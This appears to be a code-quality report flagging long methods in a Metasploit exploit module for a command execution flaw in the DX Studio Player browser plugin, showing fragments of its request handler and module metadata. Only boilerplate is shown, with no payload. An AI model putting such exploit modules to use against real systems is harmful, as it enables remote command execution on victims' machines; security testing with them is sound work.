modules/exploits/windows/browser/dxstudio_player_exec.rb
Method on_request_uri
has 52 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
Method initialize
has 37 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Worldweaver DX Studio Player shell.execute() Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability within the DX